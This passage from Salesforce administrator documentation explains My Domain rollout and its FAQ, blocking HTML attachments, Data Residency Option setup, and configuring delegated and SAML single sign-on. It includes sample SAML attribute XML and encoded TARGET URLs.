thoroughly before you roll out your new domain name. Your customizations should not use instance-based URLs.

• After you roll out your new domain name, use My Domain's redirect tools to gradually phase it in. For example, choose
the Redirected with a warning... option to make sure users update their bookmarks. When your organization is
ready to use the new domain URLs exclusively, return to setup and choose the Blocked option so users can't use their
old URLs.

• If you are using My Domain, you can identify which users are logging in with the new login URL, and when. From Setup,
click Manage Users > Login History and look at the Username and Login URL columns.

See Also:
My Domain Overview
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Getting System Performance and Maintenance Information
Using My Domain

Salesforce customers get system performance and maintenance information from trust.salesforce.com.

Available in: Unlimited, Enterprise, Developer, Professional, and Group Editions.

User Permissions Needed

“Customize Application”To set up a domain name:

Here's how to get that information using your new domain name.

1. Go to trust.salesforce.com.
2. Click the System Status tab.
3. Enter your domain name to find your instance and check the status.
4. Scroll to the System Maintenance table and look for entries for your instance.

See Also:
My Domain Overview

My Domain FAQ
Available in: Unlimited, Enterprise, Developer, and Database.com Editions. Some topics don't apply to Database.com.

• Which Salesforce Editions is My Domain available in?

• Does My Domain work differently in different Salesforce Editions?

• Is the subdomain for My Domain related to the subdomain for Sites?

• Is there a limit on how long our subdomain can be?

• After we set up My Domain, will we still be able to log in from https://login.salesforce.com?

• Will we still be able to log in from a URL that includes a Salesforce instance, like https://na1.salesforce.com?

• Can we still use our old Salesforce bookmarks?

• Will our Visualforce page URLs change?

• Is My Domain available for the API?

Which Salesforce Editions is My Domain available in?
Unlimited, Enterprise, Developer, Professional, and Group editions.
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Does My Domain work differently in different Salesforce Editions?
The only difference is that Developer Edition URLs are appended with "-developer-edition".

Is My Domain available for the API?
Yes, you can use the Salesforce APIs with your My Domain.

Is the subdomain for My Domain related to the subdomain for Sites?
No. The subdomains you use for Sites and My Domain can be the same or different.

Is there a limit on how long our subdomain can be?
Yes. You can use up to 40 characters. The protocol (https://) and the domain (my.salesforce.com) are not included
in the limit.

After we set up My Domain, will we still be able to log in from
https://login.salesforce.com?

Yes, unless your system administrator prevents it. If so, you'll need to log in using your new My Domain URL.

Will we still be able to log in from a URL that includes a Salesforce
instance, like https://na1.salesforce.com?

Yes, unless your system administrator prevents it. If so, you'll need to log in using your new My Domain URL.

Can we still use our old Salesforce bookmarks?
Yes, if your system administrator allows it. If so, you'll be redirected to the Salesforce page using its new My Domain URL.
If your system administrator prevents using old bookmarks, or you see a warning, you should update your bookmarks using
the new domain name.
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Will our Visualforce page URLs change?
Yes. URLs for your Visualforce pages will contain your new domain name.

Prohibiting HTML Attachments and Documents
Available in: All Editions except for Database.com

User Permissions Needed

“Customize Application”To prohibit uploading of HTML attachments and documents:

For security reasons, your organization may want to prohibit users from uploading HTML files. The Disallow HTML
documents and attachments security setting, if enabled, blocks users from uploading any file to the Documents tab or
as an attachment to a record if it has one of the following file extensions: htm, html, htt, htx, mhtm, mhtml, shtm, shtml,
acgi.

To prohibit uploading of HTML attachments and documents:

1. From Setup, click Security Controls > HTML Documents and Attachments Settings.
2. Select the Disallow HTML documents and attachments checkbox.
3. Click Save.

Note: HTML attachments are not permitted on solutions, regardless of whether this security setting is enabled. In
addition, this setting does not affect attachments on email templates; HTML attachments on email templates are
always permitted.

After this setting is enabled, previously-uploaded HTML documents and attachments are unaffected. However, when
users attempt to view an HTML attachment or document, their browser first prompts them to open the file in the
browser, save it to their computer, or cancel the action.

Warning:  Do not enable this setting if your organization uses the partner portal to give your partner users access to
Salesforce.
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Setting Up the Data Residency Option (DRO)
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Data Residency Option Admin”To install Data Residency Option software, documentation,
Policy Template, and Fix Releases:

Using the Salesforce Database Residency Option (DRO) requires having DRO made available for your organization and then
configuring your organization to download the DRO tools and documentation. Here’s how:

1. Contact your Salesforce representative to have DRO made available for your org.

Note:  Once DRO is enabled, users must log in to the organization through the DRO proxy.

2. Log into your Salesforce organization as an administrator.
3. Do one of the following:

• Add the “Data Residency Option Admin” permission to the profile of your choice, or
• Create a new permission set that contains the “Data Residency Option Admin” permission.

4. Assign the permission set or profile you modified to the user of your choice. This user gets access to the DRO software
downloads, documentation, Policy Templates, and Fix Releases.

5. Have the user with “Data Residency Option Admin” permission log into the organization, and from Setup, click Security
Controls > Data Residency Option.

6. Download the DRO software, documentation, and patches using the links on the DRO page.
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CONNECTION SECURITY

About Single Sign-On
Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Single sign-on is a process that allows network users to access all authorized network resources without having to log in
separately to each resource. Single sign-on allows you to validate usernames and passwords against your corporate user database
or other client application rather than having separate user passwords managed by Salesforce.

Salesforce offers the following ways to use single sign-on:

• Federated authentication using Security Assertion Markup Language (SAML): When federated authentication is
enabled, Salesforce does not validate a user’s password. Instead, Salesforce verifies an assertion in the HTTP POST request,
and allows single sign-on if the assertion is true. This is the default form of single sign-on. Federated authentication is
available in all Editions.

• Delegated authentication: When delegated authentication is enabled, Salesforce does not validate a user’s password.
Instead, Salesforce makes a Web services call to your organization to establish authentication credentials for the user. You
must request that this feature be enabled by salesforce.com. Contact salesforce.com to enable delegated authentication
single sign-on for your organization.

• Authentication providers: When authentication providers are enabled, Salesforce does not validate a user’s password.
Instead, Salesforce uses the user’s login credentials from an external service provider to establish authentication credentials.

When you have an external identity provider, and configure single sign-on for your Salesforce organization, Salesforce is then
acting as a service provider. You can also enable Salesforce as an identity provider, and use single sign-on to connect to a different
service provider. Only the service provider needs to configure single sign-on.

The Single Sign-On Settings page displays which version of single sign-on is available for your organization. To learn more
about the single sign-on settings, see Configuring SAML Settings for Single Sign-On. For more information about SAML
and Salesforce security, see the Security Implementation Guide.
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Benefits of Single Sign-On

Implementing single sign-on can offer the following advantages to your organization:

• Reduced Administrative Costs: With single sign-on, users only need to memorize a single password to access both network
resources or external applications and Salesforce. When accessing Salesforce from inside the corporate network, users are
logged in seamlessly, without being prompted to enter a username or password. When accessing Salesforce from outside
the corporate network, the users’ corporate network login works to log them in. With fewer passwords to manage, system
administrators receive fewer requests to reset forgotten passwords.

• Leverage Existing Investment: Many companies use a central LDAP database to manage user identities. By delegating
Salesforce authentication to this system, when a user is removed from the LDAP system, they can no longer access Salesforce.
Consequently, users who leave the company automatically lose access to company data after their departure.

• Time Savings: On average, a user takes five to 20 seconds to log in to an online application; longer if they mistype their
username or password and are prompted to reenter them. With single sign-on in place, the need to manually log in to
Salesforce is avoided. These saved seconds add up to increased productivity.

• Increased User Adoption: Due to the convenience of not having to log in, users are more likely to use Salesforce on a
regular basis. For example, users can send email messages that contain links to information in Salesforce.com such as
records and reports. When the recipients of the email message click the links, the corresponding Salesforce.com page opens
automatically.

• Increased Security: Any password policies that you have established for your corporate network will also be in effect for
Salesforce. In addition, sending an authentication credential that is only valid for a single use can increase security for users
who have access to sensitive data.

See Also:
Best Practices for Implementing Single Sign-On
Configuring Salesforce for Delegated Authentication
Viewing Single Sign-On Login Errors

Best Practices for Implementing Single Sign-On

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer and Database.com Editions

Customer Portals and partner portals are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Salesforce offers the following ways to use single sign-on:

588

About Single Sign-OnSecurity



• Federated authentication using Security Assertion Markup Language (SAML): When federated authentication is
enabled, Salesforce does not validate a user’s password. Instead, Salesforce verifies an assertion in the HTTP POST request,
and allows single sign-on if the assertion is true. This is the default form of single sign-on. Federated authentication is
available in all Editions.

• Delegated authentication: When delegated authentication is enabled, Salesforce does not validate a user’s password.
Instead, Salesforce makes a Web services call to your organization to establish authentication credentials for the user. You
must request that this feature be enabled by salesforce.com. Contact salesforce.com to enable delegated authentication
single sign-on for your organization.

• Authentication providers: When authentication providers are enabled, Salesforce does not validate a user’s password.
Instead, Salesforce uses the user’s login credentials from an external service provider to establish authentication credentials.

In addition, you can also configure SAML for use with portals as well as for Sites.

Delegated Authentication Best Practices

Consider the following best practices when implementing delegated authentication single sign-on for your organization.

• Your organization’s implementation of the Web service must be accessible by salesforce.com servers.  This means you must
deploy the Web service on a server in your DMZ. Remember to use your server’s external DNS name when entering the
Delegated Gateway URL in the Delegated authentication section in Salesforce (from Setup, click Security Controls
> Single Sign-On Settings).

• If salesforce.com and your system cannot connect, or the request takes longer than 10 seconds to process, the login attempt
fails.  An error is reported to the user indicating that his or her corporate authentication service is down.

• Namespaces, element names, and capitalization must be exact in SOAP requests. Wherever possible, generate your server
stub from the WSDL to ensure accuracy.

• For security reasons, you should make your Web service available by SSL only. You must use an SSL certificate from a
trusted provider, such as Verisign or Thawte. For a full list of trusted providers, contact salesforce.com.

• The IP address that originated the login request is sourceIp. Use this information to restrict access based on the user’s
location. Note that the Salesforce feature that validates login IP ranges continues to be in effect for single sign-on users.
For more information, see Setting Login Restrictions on page 571.

• You may need to map your organization’s internal usernames and Salesforce usernames. If your organization does not
follow a standard mapping, you may be able to extend your user database schema (for example, Active Directory) to include
the Salesforce username as an attribute of a user account. Your authentication service can then use this attribute to map
back to a user account.

• We recommend that you do not enable single sign-on for system administrators. If your system administrators are single
sign-on users and your single sign-on server has an outage, they have no way to log in to Salesforce. System administrators
should always be able to log in to Salesforce so they can disable single sign-on in the event of a problem.

• We recommend that you use a Developer Edition account or a sandbox when developing a single sign-on solution before
implementing it in your organization. To sign up for a free Developer Edition account, go to developer.force.com.

• Make sure to test your implementation with Salesforce.com clients such as Salesforce for Outlook, Connect for Office,
and Connect Offline. For more information, see Single Sign-On for Salesforce clients.

Federated Authentication using SAML Best Practices

Consider the following best practices when implementing federated single sign-on with SAML for your organization.

• Obtain the Recipient URL value from the configuration page and put it in the corresponding configuration parameter of
your Identity Provider.

• Salesforce allows a maximum of three minutes for clock skew with your IDP server; make sure your server’s clock is
up-to-date.

• If you are unable to log in with SAML assertion, always check the login history and note the error message.
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• You need to map your organization’s internal usernames and Salesforce usernames. You have two choices to do this: add
a unique identifier to the FederationIdentifier field of each Salesforce user, or extend your user database schema
(for example, Active Directory) to include the Salesforce username as an attribute of a user account. Choose the corresponding
option for the SAML User ID Type field and configure your authentication service to send the identifier in SAML
assertions.

• Before allowing users to log in with SAML assertions, enable the SAML organization preference and provide all the
necessary configurations.

• We recommend that you use Developer Edition account or a sandbox when testing a SAML single sign-on solution. To
sign up for a free Developer Edition account, go to developer.force.com.

• All sandbox copies are made with federated authentication with SAML disabled. Any configuration information is preserved,
except the value for Recipient URL. The Recipient URL is updated to match your sandbox URL, for example
http://cs1.salesforce.com, after you re-enable SAML. To enable SAML in the sandbox copy, from Setup, click
Security Controls > Single Sign-On Settings; then click Edit, and select SAML Enabled.

• Your identity provider must allow you to set the service provider’s audience URL. The value must match the Entity ID
value in the single sign-on configuration. The default value is https://saml.salesforce.com.

Single Sign-On for Portals Best Practices

• Only SAML version 2.0 can be used with portals.
• Only Customer Portals and partner portals are supported.
• Service provider initiated login is not supported.
• Both the portal_id and organization_id attributes are required for single sign-on for portals. If only one is specified,

the user receives an error.
• If both the portal_id and organization_id attributes are populated in the SAML assertion, the user is directed to

that portal login. If neither is populated, the user is directed to the regular SAML Salesforce login.
• More than one portal can be used with a single organization.

Single Sign-On for Sites Best Practices

• Only SAML version 2.0 can be used with Sites.
• Only Customer Portals and partner portals are supported.
• Service provider initiated login is not supported.
• The portal_id, organization_id and siteUrl attributes are required for single sign-on for Sites. If only one is

specified, the user receives an error.
• If all three of the portal_id, organization_id and siteUrl attributes are populated in the SAML assertion, the

user is directed to that Sites login. If the siteUrl isn’t populated and the other two are, the user is directed to that portal
login.

• More than one portal can be used with a single organization.

See Also:
About Single Sign-On
Single Sign-On Implementation Guide
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Understanding Delegated Authentication Single Sign-On

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Salesforce uses the following process for authenticating users using delegated authentication single sign-on:

1. When a user tries to log in—either online or using the API—Salesforce validates the username and checks the user’s
permissions and access settings.

2. If the user has the “Is Single Sign-On Enabled” user permission, then Salesforce does not validate the username and
password. Instead, a Web services call is made to the user’s organization, asking it to validate the username and password.

Note: Salesforce doesn’t store, log, or view the password in any way. It is disposed of immediately once the process
is complete.

3. The Web services call passes the username, password, and sourceIp to your Web service. (sourceIp is the IP address
that originated the login request. You must create and deploy an implementation of the Web service that can be accessed
by salesforce.com servers.)

4. Your implementation of the Web service validates the passed information and returns either true or false.
5. If the response is true, then the login process continues, a new session is generated, and the user proceeds to the application.

If false is returned, then the user is informed that his or her username and password combination is invalid.

Note:  There may be a momentary delay before a user can log in after being given delegated authentication due to
the time required for the user account to become available in the organization.

See Also:
About Single Sign-On
Administrator setup guide: Single Sign-On Implementation Guide
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Configuring Salesforce for Delegated Authentication

Available in: Professional, Enterprise, Unlimited, Developer,  and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

To enable delegated authentication single sign-on (SSO) for your organization:

1. Contact salesforce.com to enable delegated authentication single sign-on for your organization.
2. Build your single sign-on Web service:

a. In Salesforce, download the Web Services Description Language (WSDL) file AuthenticationService.wsdl
from Setup by clicking Develop > API > Download Delegated Authentication WSDL. The WSDL describes the
delegated authentication single sign-on service and can be used to automatically generate a server-side stub to which
you can add your specific implementation. For example, in the WSDL2Java tool from Apache Axis, you can use the
--server-side switch. In the wsdl.exe tool from .NET, you can use the /server switch.

For a sample request and response, see Sample SOAP Message for Delegated Authentication on page 609.

b. Add a link to your corporate intranet or other internally-accessible site that takes the authenticated user’s credentials
and passes them through an HTTP POST to the Salesforce login page.

Because Salesforce does not use the password field other than to pass it back to you, you do not need to send a
password in this field. Instead, you could pass another authentication token, such as a Kerberos Ticket so that your
actual corporate passwords are not passed to or from Salesforce.

You can configure the Salesforce delegated authentication authority to allow only tokens or to accept either tokens or
passwords. If the authority only accepts tokens, a Salesforce user cannot log in to Salesforce directly, because they cannot
create a valid token. However, many companies choose to allow both tokens and passwords. In this environment, a
user could still log in to Salesforce through the login page.

When the salesforce.com server passes these credentials back to you in the Authenticate message, verify them, and
the user will gain access to the application.

3. In Salesforce, specify your organization’s single sign-on gateway URL from Setup by clicking Security Controls > Single
Sign-On Settings > Edit. Enter the URL in the Delegated Gateway URL text box.

For security reasons, Salesforce restricts the outbound ports you may specify to one of the following:

• 80: This port only accepts HTTP connections.
• 443: This port only accepts HTTPS connections.
• 1024–66535 (inclusive): These ports accept HTTP or HTTPS connections.

4. Optionally, check the Force Delegated Authentication Callout box.
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Note:  When this box is unchecked, a call is not made to the SSO endpoint if the login attempt first fails because
of login restrictions within the Salesforce organization. If you must record every login attempt, then check this
box to force a callout to the SSO endpoint regardless of login restriction failures.

5. Enable the “Is Single Sign-On Enabled” permission.

Important: If single sign-on is enabled for your organization, API and desktop client users can’t log into Salesforce
unless their IP address is included on your organization’s list of trusted IP addresses or on their profile, if their profile
has IP address restrictions set. Futhermore, the single sign-on authority usually handles login lockout policies for
users with the “Is Single Sign-On Enabled” permission. However, if the security token is enabled for your organization,
then your organization’s login lockout settings determine the number of times a user can attempt to log in with an
invalid security token before being locked out of Salesforce. For more information, see Setting Login Restrictions on
page 571. For information on how to view login errors, see Viewing Single Sign-On Login Errors on page 593.

See Also:
About Single Sign-On
Understanding Delegated Authentication Single Sign-On

Viewing Single Sign-On Login Errors

User Permissions Needed

“Modify All Data”To view Single Sign-On login errors:

If your organization is enabled for Single Sign-On using delegated authentication and has built a Single Sign-On solution,
you can view the most recent Single Sign-On login errors for your organization.

1. From Setup, click Manage Users > Delegated Authentication Error History.
2. For the twenty-one most recent login errors, you can view the user's username, login time, and the error.

Note:  Contact salesforce.com to learn more about enabling Single Sign-On for your organization.

See Also:
About Single Sign-On
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About SAML
Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Security Assertion Markup Language (SAML) is an XML-based standard that allows you to communicate authentication
decisions between one service and another. It underlies many Web single sign-on solutions. Salesforce supports SAML for
single sign-on into Salesforce from a corporate portal or identity provider.

Much of the work to set up single sign-on using SAML occurs with your identity provider:

1. Establish a SAML identity provider and gather information about how they will connect to Salesforce. This is the provider
that will send single sign-on requests to Salesforce.

2. Provide information to your identity provider, such as the URLs for the start and logout pages.
3. Configure Salesforce using the instructions in Configuring SAML Settings for Single Sign-On. This is the only step that

takes place in Salesforce.

Your identity provider should send SAML assertions to Salesforce using the SAML Web Single Sign-on Browser POST
profile. Salesforce sends SAML responses to the Identity Provider Login URL specified under Setup, in Security
Controls > Single Sign-On Settings. Salesforce receives the assertion, verifies it against your Salesforce configuration, and
allows single sign-on if the assertion is true.

If you have problems with the SAML assertion after you configure Salesforce for SAML, use the SAML Assertion Validator
to validate the SAML assertion. You may need to obtain a SAML assertion from your identity provider.

If your users are having problems using SAML to login, you can review the SAML login history to determine why they were
not able to log in and share that information with your identity provider.

If your identity provider supports metadata, and if you've configured SAML using version 2.0, you can click Download
Metadata to download an XML configuration file to send them, which they can then upload to automatically configure their
settings for connecting to your Salesforce organization.

See Also:
Viewing Single Sign-On Settings
Identity Provider Values
Example SAML Assertions
SAML Assertion Validation Errors
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Working With Your Identity Provider

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

1. You must gather the following information from your identity provider before configuring Salesforce for SAML.

• The version of SAML the identity provider uses (1.1 or 2.0)
• The entity ID of the identity provider (also known as the issuer)
• An authentication certificate.

Tip:  Be sure to store the certificate where you can access it from your browser. This will be uploaded to
Salesforce in a later step.

• The following SAML assertion parameters, as appropriate:

◊ The SAML user ID type
◊ The SAML user ID location
◊ Attribute Name
◊ Attribute URI
◊ Name ID format

Note:  Attribute Name, Attribute URI, and Name ID format are only necessary if the SAML User ID
Location is in an Attribute element, and not the name identifier element of a Subject statement.

You may also want to share more information about these values with your identity provider.

Tip:  Enable Salesforce for SAML and take a screenshot of the page for your identity provider. From Setup, click
Security Controls > Single Sign-On Settings, click Edit, then select SAML Enabled.

2. Work with your identity provider to setup the start, login, and logout pages.
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3. Share the example SAML assertions with your identity provider so they can determine the format Salesforce requires for
successful single sign-on.

See Also:
About SAML

Configuring SAML Settings for Single Sign-On

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

From this page, you can configure your organization to use single sign-on. You can also set up just-in-time provisioning. Work
with your identity provider to properly configure these settings. For more information about single sign-on, see About Single
Sign-On. For more information about just-in-time provisioning, see About Just-In-Time Provisioning.

Configuring Single Sign-On

To configure SAML settings for single sign-on from your corporate identity provider to Salesforce:

1. Gather information from your identity provider.
2. Provide information to your identity provider.
3. In Salesforce, from Setup, click Security Controls > Single Sign-On Settings, and click Edit.
4. Select SAML Enabled. You must enable SAML to view the SAML single sign-on settings.
5. Specify the SAML version used by your identity provider.
6. Enter the Issuer. This is often referred to as the entity ID for the identity provider.
7. For the Identity Provider Certificate, use the Browse button to locate and upload the authentication certificate

issued by your identity provider.
8. For SAML 2.0, if your identity provider has specific login or logout pages, specify them in Identity Provider Login URL

and Identity Provider Logout URL, respectively.

Note:  These fields appear in Developer Edition and sandbox organizations by default and in production
organizations only if My Domain is enabled. The fields do not appear in trial organizations or sandboxes linked
to trial organizations.
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9. For the Custom Error URL, specify the URL of the page users should be directed to if there's an error during SAML
login. It must be a publicly accessible page, such as a public site Visualforce page. The URL can be absolute or relative.

10. If you are enabling just-in-time provisioning for security, check User Provisioning Enabled.

Note:

• Just-in-time provisioning requires a Federation ID in the user type. In SAML User ID Type, select Assertion
contains the Federation ID from the User object.

• If your identity provider previously used the Salesforce username, communicate to them that they must use
the Federation ID.

11. For the SAML User ID Type, SAML User ID Location, and other values as appropriate, specify the value provided
by your identity provider.

12. If your Salesforce organization has domains deployed, specify whether you want to use the base domain
(https://saml.salesforce.com) or the custom domain for the Entity ID. You must share this information with
your identity provider.

Tip:  Generally, use the custom domain as the entity ID. If you already have single sign-on configured before
deploying a domain, the base domain is the entity ID. If you are providing Salesforce to Salesforce services, you
must specify the custom domain.

13. Click Save.

If your identity provider supports metadata, and if you've configured SAML using version 2.0, you can click Download
Metadata to download an XML configuration file to send them, which they can then upload to automatically configure their
settings for connecting to your Salesforce organization.

After you have configured and saved your SAML settings, test them by trying to access the identity provider's application.
Your identity provider directs the user's browser to POST a form containing SAML assertions to the Salesforce login page.
Each assertion is verified, and if successful, single sign-on is allowed.

If you have difficulty signing on using single sign-on after you have configured and saved your SAML settings, use the SAML
Assertion Validator. You may have to obtain a SAML assertion from your identity provider first.

If your users are having problems using SAML to login, you can review the SAML login history to determine why they were
not able to log in and share that information with your identity provider.

If you are using SAML version 2.0, after you've finished configuring SAML, the OAuth 2.0 Token Endpoint field is populated.
Use this with the Web single sign-on authentication flow for OAuth 2.0.

See Also:
About SAML
Best Practices for Implementing Single Sign-On
Validating SAML Settings for Single Sign-On
Administrator setup guide: Single Sign-On Implementation Guide
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Viewing Single Sign-On Settings

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

After you have configured your Salesforce organization to use SAML, you can view the single sign-on settings. From Setup,
click Security Controls > Single Sign-On Settings.

This page lists the details of your SAML configuration. Most of these fields are the same as the fields on the page where you
configured SAML. The following fields contain information automatically generated by completing the configuration. The
available fields depend on your configuration.

DescriptionField

For SAML 2.0 only. If you select “Assertion contains User's salesforce.com username” for
SAML User ID Type and “User ID is in the NameIdentifier element of the Subject

Salesforce Login URL

statement” for SAML User ID Location, this URL is the URL associated with login for
the Web single sign-on OAuth assertion flow.

For SAML 2.0. Displays the Salesforce logout URL that the user is directed to after he or
she logs off. This URL is only used if no value is specified for Identity Provider Logout
URL.

Salesforce Logout URL

For SAML 2.0 only: The ACS URL used with enabling Salesforce as an identity provider
in the Web single sign-on OAuth assertion flow.

OAuth 2.0 Token
Endpoint

From this page you can do any of the following:

• Click Edit to change the existing SAML configuration.

• Click SAML Assertion Validator to validate the SAML settings for your organization using a SAML assertion provided
by your identity provider.
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• If your identity provider supports metadata, and if you've configured SAML using version 2.0, you can click Download
Metadata to download an XML configuration file to send them, which they can then upload to automatically configure
their settings for connecting to your Salesforce organization.

See Also:
About SAML

Identity Provider Values

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Before you can configure Salesforce for SAML, you must receive information from your identity provider. This information
must be used on the single sign-on page.

The following information might be useful for your identity provider.

DescriptionField

The version of SAML your identity provider uses. Salesforce currently supports version 1.1
and 2.0. The SAML specifications for the various versions are linked below:

SAML Version

• SAML 1.1

• SAML 2.0

The Entity ID—a URL that uniquely identifies your SAML identity provider. SAML
assertions sent to Salesforce must match this value exactly in the <saml:Issuer> attribute
of SAML assertions.

Issuer

The issuer in SAML requests generated by Salesforce, and is also the expected audience of
any inbound SAML Responses. If you don’t have domains deployed, this value is always

Entity ID

https://saml.salesforce.com. If you have domains deployed, Salesforce recommends
that you use your custom domain name. You can find the value on the Single Sign-On Settings
page. From Setup, click Security Controls > Single Sign-On Settings.
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DescriptionField

The authentication certificate issued by your identity provider.Identity Provider
Certificate

For SAML 2.0 only: The URL where Salesforce sends a SAML request to start the login
sequence.

If you have domains deployed and a value specified for this field, login requests are usually
sent to the address specified by this field. However, if you need to bypass this value (for

Identity Provider
Login URL

example, your identity provider is down) add the login parameter to the query string for the
login page. For example: http://mydomain.my.salesforce.com?login

Note: This field appears in Developer Edition production and sandbox organizations
by default and in production organizations only if My Domain is enabled. This field
does not appear in trial organizations or sandboxes linked to trial organizations.

For SAML 2.0 only: The URL to direct the user to when they click the Logout link in
Salesforce. The default is http://www.salesforce.com.

Identity Provider
Logout URL

Note: This field appears in Developer Edition production and sandbox organizations
by default and in production organizations only if My Domain is enabled. This field
does not appear in trial organizations or sandboxes linked to trial organizations.

The URL associated with login for the Web single sign-on flow.Salesforce Login URL

For SAML 2.0 only: The ACS URL used with enabling Salesforce as an identity provider
in the Web single sign-on OAuth assertion flow.

OAuth 2.0 Token
Endpoint

The URL of the page users should be directed to if there’s an error during SAML login. It
must be a publicly accessible page, such as a public site Visualforce page. The URL can be
absolute or relative.

Custom Error URL

The element in a SAML assertion that contains the string that identifies a Salesforce user.
Values are:

Assertion contains User’s salesforce.com username

Use this option if your identity provider passes the Salesforce username in SAML
assertions.

SAML Identity Type

Assertion contains the Federation ID from the User object

Use this option if your identity provider passes an external user identifier, for example
an employee ID, in the SAML assertion to identify the user.

Assertion contains the User ID from the User object

Use this option if your identity provider passes an internal user identifier, for example a
user ID from your Salesforce organization, in the SAML assertion to identify the user.
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DescriptionField

The location in the assertion where a user should be identified. Values are:

Identity is in the NameIdentifier element of the Subject
statement

The Salesforce Username or FederationIdentifier is located in the <Subject>
statement of the assertion.

SAML Identity Location

Identity is in an Attribute element

The Salesforce Username or FederationIdentifier is specified in an
<AttributeValue>, located in the <Attribute> of the assertion.

If “Identity is in an Attribute element” is selected, this contains the value of the
AttributeName that is specified in <Attribute> that contains the User ID.

Attribute Name

If SAML 1.1 is the specified SAML version and “Identity is in an Attribute
element” is selected, this contains the value of the AttributeNamespace that is specified
in <Attribute>.

Attribute URI

If SAML 2.0 is the specified SAML version and “Identity is in an Attribute
element” is selected, this contains the value for the nameid-format. Possible values include

Name ID Format

unspecified, emailAddress or persistent. All legal values can be found in the “Name
Identifier Format Identifiers” section of the Assertions and Protocols SAML 2.0 specification.

If you’re using My Domain, chose the binding mechanism your identity provider requests
for your SAML messages. Values are:

HTTP POST

HTTP POST binding sends SAML messages using base64-encoded HTML forms.

Service Provider
Initiated Request
Binding

HTTP Redirect

HTTP Redirect binding sends base64-encoded and URL-encoded SAML messages
within URL parameters.

No matter what request binding is selected, the SAML Response will always use HTTP
POST binding.

Start, Login, and Logout URL Values

In addition to the information used during the single sign-on, your identity provider can also set the start, login, and logout
pages. You can also specify these pages yourself when you configure single sign-on.

The following information might be useful to your identity provider if they are setting these pages.

• The SAML specification supports an HTML form that is used to pass the SAML assertion via HTTPS POST.
• For SAML 1.1, the SAML identity provider can embed name-value pairs in the TARGET field to pass this additional

information to Salesforce prepended with a specially formatted URL that contains URL-encoded parameters.
• The URL for SAML 1.1 to include in the TARGET field is as follows: https://saml.salesforce.com/?
• For SAML 2.0, instead of using the TARGET field, the identity providers uses the <AttributeStatement> in the SAML

assertion to specify the additional information.
• Salesforce supports the following parameters:
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Note:  For SAML 1.1 these parameters must be URL-encoded. This allows the URLs, passed as values that
include their own parameters, to be handled correctly. For SAML 2.0, these parameters are part of the
<AttributeStatement>.

◊ ssoStartPage is the page to which the user should be redirected when trying to log in with SAML. The user is
directed to this page when requesting a protected resource in Salesforce, without an active session. The ssoStartPage
should be the SAML identity provider’s login page.

◊ startURL is the URL where you want the user to be directed when sign-on completes successfully. This URL can be
absolute, such as https://na1.salesforce.com/001/o or it can be relative, such as /001/o. This parameter is
only used in SAML 1.1. In SAML 2.0, the start URL is the page the user attempted to access before they were
authenticated.

◊ logoutURL is the URL where you want the user to be directed when they click the Logout link in Salesforce. The
default is http://www.salesforce.com.

The following sample TARGET field is for SAML 1.1, and includes properly-encoded parameters. It passes a customized start
page, as well as start and logout URLs embedded as parameter values in the query string.

https://saml.salesforce.com/?ssoStartPage=https%3A%2F
%2Fwww.customer.org%2Flogin%2F&startURL=%2F001%2Fo&logoutURL=http%3A%2F%2Fwww.salesforce.com

The following is an example of an <AttributeStatement> for SAML 2.0 that contains both ssoStartPage and
logoutURL:

<saml:AttributeStatement>
<saml:Attribute Name="ssoStartPage"

NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:anyType">
http://www.customer.org

</saml:AttributeValue>
</saml:Attribute>

<saml:Attribute Name="logoutURL"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">

https://www.salesforce.com
</saml:AttributeValue>

</saml:Attribute>
</saml:AttributeStatement>

See Also:
About SAML
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Customizing SAML Start, Error, Login, and Logout Pages

Federated Authentication is available in: All Editions

Delegated Authentication is available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Authentication Providers are available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

